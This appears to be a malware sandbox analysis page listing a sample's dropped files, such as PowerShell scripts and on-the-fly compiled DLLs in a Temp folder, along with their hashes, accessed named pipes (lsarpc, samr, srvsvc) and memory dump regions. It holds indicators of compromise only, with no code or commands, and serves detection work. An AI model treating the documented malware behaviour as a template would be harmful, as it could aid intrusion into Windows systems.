0c4dfa824f85d2d1dfeafc303ce9780360337ef449b6d4c896690b30ba96c7f8

SHA512
060533de7bd966d17ba7d7307e504c27b597ea9c7e66e9cbec000a4cd4c2f30b9d06e445f8e00985c2dccb46cb99bef229fe451c06e001b1f6b5527ca0e9316d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Get-Content.PS1
MD5
0f49574acd4f54227055d966b15fffc0

SHA1
6c4559636c5735ed5c4d8ad033b8bf65985fc1fb

SHA256
562ad9b139d5772493df4dad3a80c63c5b30075520b3f9d71ba45be6c7870a4b

SHA512
ea70444ee71f48d6bac93226e91c97c3f8223d4a3ad283f7cf54f389983624bb14b7b7f60faf788716b8acc5be96e26951355f65ad3a9b23841f797a6dd2dbc2

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES5E27.tmp
MD5
dff57f9442014ac85aa2c7b8c5dffd99

SHA1
c6cb51a515ebca949a8d1ecd78f7102236b28711

SHA256
ce3f1fb4b0162c00d34ae9fff95bd3ae6ae38ce357ed6441becff6fa0bf7913b

SHA512
17a1292efbb8c9fd12c91336d6e88b1bf3496823a32fce1cf5bc6d308eec7554dd9cce99a490d5d625b71cdd5cffe55f0785cab79fd2afab15c9bf4cc2550100

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES620D.tmp
MD5
eb1031db75a0316a4c9b741169160e2e

SHA1
c3ba98553b1c81d71f45052e3af3e79a1ff274e6

SHA256
92a8cd57a10baf2e15efa373cee574d2413e8caf8de1b1937fee9cc67c320c76

SHA512
119b423e34060e14020026b85e26dc3680f1c219ea7cfed8c1f0a13a429d839c81adeaec40f1f155cc1c652a09ad754ba5a6fa5d350bfe4ccc8fb2043a54f2de

Download Submit
C:\Users\Admin\AppData\Local\Temp\l2dqhxai\l2dqhxai.dll
MD5
2a5aca1ba2bde4cdf33f3e7a82a5cc70

SHA1
145a0998c4f236507848f8877f42b36644f352b2

SHA256
5003f8c2e1ae4aca2a86345f9255c3974e96136ed5fb90e49b49df42ce913d7e

SHA512
0fcb74bd35e145e6c4131a9fef878b2c4d59462ef95b2b5a84d5efbc2f01498313e38a271b4fe4d64df5fc1d97cafff02ae42d212ac32f4eb369442416943384

Download Submit
C:\Users\Admin\AppData\Local\Temp\qm5p2bb2\qm5p2bb2.dll
MD5
6feea9d13bba1eb6dd4c7e5418a746fa

SHA1
90fb935d6f5c8a8ecd02b71dbf067ec6b017db62

SHA256
e1c5b0b4d42420b1427b878eced96ccb5cc321f6fb9a0b9511138701cd4824f7

SHA512
fd64d4151e71265fbe7830199e7744b4cf042fd1022179202718bebf5a0a999b31bd95fed66fdaa4b495cdfccd16a9457251e9965691c548afc948b33bcfba0a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1
MD5
37330f50cf392bca59567a22de3b836a

SHA1
f7b37328533a133567aa28f03015da69e2e36547

SHA256
a34c2923388f87e84a4f67f123626af4eff5e7d7e5abe327b6a1b1aa55a12de1

SHA512
5d1c19df182caf82388fd05e30422fa957af30a4092334a53a128e36d6c3ce2cb20aa10d96344cd8b1b145180df4d737b30bbd48a1c809ce25a82912397b19a6

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
abe961c436b660148791de6e267482b5

SHA1
26b12234d2cece6560674e56fd5ba012ce866170

SHA256
6ff2bc4bd48d5ec0948aee5e6e3fa17c199cdb50f50d24e532a07ee0ec5cbfe9

SHA512
c7a61bcbed935ce514d3222684d9ab67f3a7116c69acd7a1dce034cfe8fbd39c1855e0d06a6b466f7a045df72770de75f5d18400a86ac0a63240a9e514cc5969

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
abe961c436b660148791de6e267482b5

SHA1
26b12234d2cece6560674e56fd5ba012ce866170

SHA256
6ff2bc4bd48d5ec0948aee5e6e3fa17c199cdb50f50d24e532a07ee0ec5cbfe9

SHA512
c7a61bcbed935ce514d3222684d9ab67f3a7116c69acd7a1dce034cfe8fbd39c1855e0d06a6b466f7a045df72770de75f5d18400a86ac0a63240a9e514cc5969

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
abe961c436b660148791de6e267482b5

SHA1
26b12234d2cece6560674e56fd5ba012ce866170

SHA256
6ff2bc4bd48d5ec0948aee5e6e3fa17c199cdb50f50d24e532a07ee0ec5cbfe9

SHA512
c7a61bcbed935ce514d3222684d9ab67f3a7116c69acd7a1dce034cfe8fbd39c1855e0d06a6b466f7a045df72770de75f5d18400a86ac0a63240a9e514cc5969

Download Submit
C:\Windows\system32\rfxvmt.dll
MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\PIPE\lsarpc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\lsarpc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\lsarpc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\samr
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\samr
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\samr
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\l2dqhxai\CSC4F574D1DB40F4B47834442E9BD3E4D2E.TMP
MD5
9123c5ce8a7d7212c8e8ed20a4a0e1a3

SHA1
df16325e00a2f847099363392afc1fb51375261c

SHA256
baaf98202424a60bce20a9894e086026768ff2f5cddd76c7383d89f4a6195938

SHA512
d4a6242834db9bd8f9dc14781269166a0ef08dbd6d80be52299574f6dac1960e575e00c256ee4b685874126c9070f26104e567e8bcd963deac1bb3ba25b5e690

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\l2dqhxai\l2dqhxai.0.cs
MD5
fdff1f264c5f5570a5393659b154cb88

SHA1
de254de5e517074a9986b36fec83f921aa9aa497

SHA256
ff936e8436684fa709bed64fea9021468fd0c744a4e3412b3ef86e642d6c3769

SHA512
db434d37d6e5acb096c26abe7f07744a1a1379179f013810df3f95e41e2b7f55dfe7dc65d053a3d0c6401bc13c7dd99e940073fbe741237966620761c3b9e35a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\l2dqhxai\l2dqhxai.cmdline
MD5
b14fc02daf21e1a9afed4abb0d793ae2

SHA1
182bd9db671593bc5f69a539a2017413c3b44fcb

SHA256
7c77490bc5b5280b43a90e5dfb35f3c324f27a62faab00e7c40cc07d678ec202

SHA512
b4c723d296c95f8972907294abd146e1cc0be4b45037874f8e232465d1d9adfdf5af2dbbe502784e2e9855a9fb6f5b329bd7e426bdda4f5d84cdc39e37079367

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qm5p2bb2\CSCDB32768EE8AF42D1B5ADDF297CB6378.TMP
MD5
db12ca15b40b23083ab085832baab0c2

SHA1
565acef91aaff921a9611e5d797d0427fb8195f1

SHA256
d8499331f04510f4d1c30bde81025bec5fceb50d326f3ef50fa4b62688e9e40b

SHA512
bd623e3def390dfbf08f0c4932eb3e1e0bbfc617ca5cbb337c1bb824ea4fe75401cf0a87a4f083ad83709f09645bcb74a712bd356b303981aea437f6859a2499

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qm5p2bb2\qm5p2bb2.0.cs
MD5
fe552aa471e3747e57ddeff23d6da1fc

SHA1
16832293206ec339d47940533443f4fb375826fa

SHA256
60122a8ad7d370fa8dd0ca1b65f1b7685128c526195ac2ffb4edab103d45208d

SHA512
8cc715d2ad259d557b818e86b9fab2f91186ca4b1cde477218c0943313ec587d87499288598a2c64969fe2ee6eaf2132c269869f6a7201cf82100620d3ce34e6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qm5p2bb2\qm5p2bb2.cmdline
MD5
26c48d019c4d46dbc9dea37dfa6349fd

SHA1
c1ed85cd2832a5d4ec80631eddb48add959a9aa4

SHA256
c43ef1d81deb91312ef45f1e5a857ae054027990ed6bf1680659a43e61edfd5a

SHA512
2450585b32d37f7b02630c52d5e37865c4db3d54eb947c831384a72d3d4e4df082961e078472db7de2ca73be723de3be0bf798522dbf96588207a46f0949decd

Download Submit
\Windows\Branding\mediasrv.png
MD5
b69939766105d4046be4491143b39330

SHA1
7ae64736d59fc0a88194e660a517e9d6a767ae71

SHA256
136505bce328a92a2cae17917808b38e14566dc8cf2cafc07a082e0b1faeeb83

SHA512
1abbce8e75f420b238c24f8465e71d2ab774bee2ab340c125da7a03613f5a88b39c39a5d419a2a95949e8c7eafb58d309a52dd4b33e181f8ab60669e12a667ab

Download Submit
\Windows\Branding\mediasvc.png
MD5
7507da4d158eb385afcb6ac8aa8ddc32

SHA1
863311e2958e9635799ba60521b6a508f0457118

SHA256
0b27dc9deb3071f8ef7bde42f0acec45047055d261f6ad626b16cb90981cecfc

SHA512
321265108ebbfd617d8b67d70237b08a13585f2c8b4dafca4695bebb1d6c3aabda3a582434f004441ce5019d356958337eddd590dd8215bcb4376495e5d28f73

Download Submit
memory/292-145-0x0000000000000000-mapping.dmp

Download
memory/328-170-0x0000000000000000-mapping.dmp

Download
memory/396-137-0x0000000000000000-mapping.dmp

Download
memory/396-89-0x000000001B5B0000-0x000000001B5B1000-memory.dmp

Filesize
4KB

Download
memory/396-92-0x000000001AA34000-0x000000001AA36000-memory.dmp

Filesize
8KB

Download
memory/396-91-0x000000001AA30000-0x000000001AA32000-memory.dmp

Filesize
8KB

Download
memory/396-78-0x0000000000000000-mapping.dmp

Download
memory/396-81-0x000007FEF59A0000-0x000007FEF638C000-memory.dmp

Filesize
9.9MB

Download
memory/396-87-0x000000001B420000-0x000000001B421000-memory.dmp

Filesize
4KB

Download
memory/396-85-0x0000000002690000-0x0000000002691000-memory.dmp

Filesize
4KB

Download
memory/396-90-0x00000000024F0000-0x00000000024F1000-memory.dmp

Filesize
4KB

Download
memory/572-159-0x0000000000000000-mapping.dmp

Download
memory/572-23-0x0000000000000000-mapping.dmp

Download
memory/660-125-0x0000000000000000-mapping.dmp

Download
memory/660-143-0x0000000000000000-mapping.dmp

Download
memory/688-26-0x0000000000000000-mapping.dmp

Download
memory/688-131-0x0000000000000000-mapping.dmp

Download
memory/704-136-0x0000000000000000-mapping.dmp

Download
memory/736-156-0x0000000000000000-mapping.dmp

Download
memory/740-117-0x000000001C650000-0x000000001C651000-memory.dmp

Filesize
4KB

Download
memory/740-14-0x000007FEF59A0000-0x000007FEF638C000-memory.dmp

Filesize
9.9MB

Download
memory/740-58-0x000000001AA3A000-0x000000001AA59000-memory.dmp

Filesize
124KB

Download
memory/740-19-0x000000001AA30000-0x000000001AA32000-memory.dmp

Filesize
8KB

Download
memory/740-41-0x000000001C420000-0x000000001C421000-memory.dmp

Filesize
4KB

Download
memory/740-20-0x000000001AA34000-0x000000001AA36000-memory.dmp

Filesize
8KB

Download
memory/740-40-0x000000001B580000-0x000000001B581000-memory.dmp

Filesize
4KB

Download
memory/740-12-0x0000000000000000-mapping.dmp

Download
memory/740-22-0x000000001B7B0000-0x000000001B7B1000-memory.dmp

Filesize
4KB

Download
memory/740-42-0x000000001A9D0000-0x000000001A9D1000-memory.dmp

Filesize
4KB

Download
memory/740-39-0x000000001A9C0000-0x000000001A9C1000-memory.dmp

Filesize
4KB

Download
memory/740-30-0x00000000026B0000-0x00000000026B1000-memory.dmp

Filesize
4KB

Download
memory/740-16-0x000000001AAB0000-0x000000001AAB1000-memory.dmp

Filesize
4KB

Download
memory/740-17-0x0000000002440000-0x0000000002441000-memory.dmp

Filesize
4KB

Download
memory/740-18-0x0000000002470000-0x0000000002471000-memory.dmp

Filesize
4KB

Download
memory/740-15-0x0000000002360000-0x0000000002361000-memory.dmp

Filesize
4KB

Download
memory/740-13-0x000007FEFC371000-0x000007FEFC373000-memory.dmp

Filesize
8KB

Download
memory/760-32-0x0000000000000000-mapping.dmp

Download
memory/832-132-0x0000000000000000-mapping.dmp

Download
memory/936-118-0x0000000000000000-mapping.dmp

Download
memory/1076-154-0x0000000000000000-mapping.dmp

Download
memory/1132-126-0x0000000000000000-mapping.dmp

Download
memory/1144-171-0x0000000000000000-mapping.dmp

Download
memory/1156-124-0x0000000000000000-mapping.dmp

Download
memory/1176-134-0x0000000000000000-mapping.dmp

Download
memory/1208-127-0x0000000000000000-mapping.dmp

Download
memory/1332-153-0x0000000000000000-mapping.dmp

Download
memory/1364-146-0x0000000000000000-mapping.dmp

Download
memory/1364-35-0x0000000000000000-mapping.dmp

Download
memory/1368-142-0x0000000000000000-mapping.dmp

Download
memory/1368-161-0x0000000000000000-mapping.dmp

Download
memory/1368-151-0x0000000000000000-mapping.dmp

Download
memory/1436-150-0x0000000000000000-mapping.dmp

Download
memory/1488-133-0x0000000000000000-mapping.dmp

Download
memory/1508-49-0x00000000023F0000-0x00000000023F2000-memory.dmp

Filesize
8KB

Download
memory/1508-46-0x000007FEF59A0000-0x000007FEF638C000-memory.dmp

Filesize
9.9MB

Download
memory/1508-129-0x0000000000000000-mapping.dmp

Download
memory/1508-50-0x00000000023F4000-0x00000000023F6000-memory.dmp

Filesize
8KB

Download
memory/1508-77-0x000000001BA50000-0x000000001BA51000-memory.dmp

Filesize
4KB

Download
memory/1508-52-0x000000001B380000-0x000000001B381000-memory.dmp

Filesize
4KB

Download
memory/1508-43-0x0000000000000000-mapping.dmp

Download
memory/1508-54-0x000000001B740000-0x000000001B741000-memory.dmp

Filesize
4KB

Download
memory/1508-56-0x000000001B500000-0x000000001B501000-memory.dmp

Filesize
4KB

Download
memory/1508-57-0x0000000002360000-0x0000000002361000-memory.dmp

Filesize
4KB

Download
memory/1508-63-0x000000001BDB0000-0x000000001BDB1000-memory.dmp

Filesize
4KB

Download
memory/1508-76-0x000000001B960000-0x000000001B961000-memory.dmp

Filesize
4KB

Download
memory/1580-123-0x0000000000000000-mapping.dmp

Download
memory/1592-167-0x00000000194E0000-0x00000000194E2000-memory.dmp

Filesize
8KB

Download
memory/1592-183-0x0000000019FF0000-0x0000000019FF1000-memory.dmp

Filesize
4KB

Download
memory/1592-201-0x00000000194EA000-0x0000000019509000-memory.dmp

Filesize
124KB

Download
memory/1592-180-0x00000000012C0000-0x00000000012C1000-memory.dmp

Filesize
4KB

Download
memory/1592-162-0x0000000000000000-mapping.dmp

Download
memory/1592-181-0x00000000012D0000-0x00000000012D1000-memory.dmp

Filesize
4KB

Download
memory/1592-199-0x000000001A040000-0x000000001A041000-memory.dmp

Filesize
4KB

Download
memory/1592-175-0x0000000001270000-0x0000000001271000-memory.dmp

Filesize
4KB

Download
memory/1592-168-0x00000000194E4000-0x00000000194E6000-memory.dmp

Filesize
8KB

Download
memory/1592-191-0x0000000019FF0000-0x0000000019FF1000-memory.dmp

Filesize
4KB

Download
memory/1592-184-0x000000001A000000-0x000000001A001000-memory.dmp

Filesize
4KB

Download
memory/1592-164-0x000007FEF59A0000-0x000007FEF638C000-memory.dmp

Filesize
9.9MB

Download
memory/1592-182-0x0000000019FD0000-0x0000000019FD1000-memory.dmp

Filesize
4KB

Download
memory/1608-144-0x0000000000000000-mapping.dmp

Download
memory/1608-128-0x0000000000000000-mapping.dmp

Download
memory/1696-135-0x0000000000000000-mapping.dmp

Download
memory/1700-160-0x0000000000000000-mapping.dmp

Download
memory/1708-139-0x0000000000000000-mapping.dmp

Download
memory/1752-122-0x0000000000000000-mapping.dmp

Download
memory/1904-107-0x000000001ACF0000-0x000000001ACF2000-memory.dmp

Filesize
8KB

Download
memory/1904-104-0x000007FEF59A0000-0x000007FEF638C000-memory.dmp

Filesize
9.9MB

Download
memory/1904-155-0x0000000000000000-mapping.dmp

Download
memory/1904-108-0x000000001ACF4000-0x000000001ACF6000-memory.dmp

Filesize
8KB

Download
memory/1904-100-0x0000000000000000-mapping.dmp

Download
memory/1908-130-0x0000000000000000-mapping.dmp

Download
memory/1924-147-0x0000000000000000-mapping.dmp

Download
memory/1928-121-0x0000000000000000-mapping.dmp

Download
memory/1948-120-0x0000000000000000-mapping.dmp

Download
memory/2008-3-0x0000000000400000-0x00000000008EA000-memory.dmp

Filesize
4.9MB

Download
memory/2008-2-0x0000000000400000-0x00000000008EA000-memory.dmp

Filesize
4.9MB

Download
memory/2008-4-0x0000000000400000-0x00000000008EA000-memory.dmp

Filesize
4.9MB

Download
memory/2008-10-0x0000000043566000-0x0000000043567000-memory.dmp

Filesize
4KB

Download
memory/2008-8-0x0000000043562000-0x0000000043564000-memory.dmp

Filesize
8KB

Download
memory/2008-5-0x000007FEF59A0000-0x000007FEF638C000-memory.dmp

Filesize
9.9MB

Download
memory/2008-6-0x0000000043AA0000-0x0000000043D53000-memory.dmp

Filesize
2.7MB

Download
memory/2008-9-0x0000000043564000-0x0000000043566000-memory.dmp

Filesize
8KB

Download
memory/2008-11-0x0000000043567000-0x0000000043568000-memory.dmp

Filesize
4KB

Download
memory/2044-138-0x0000000000000000-mapping.dmp

Download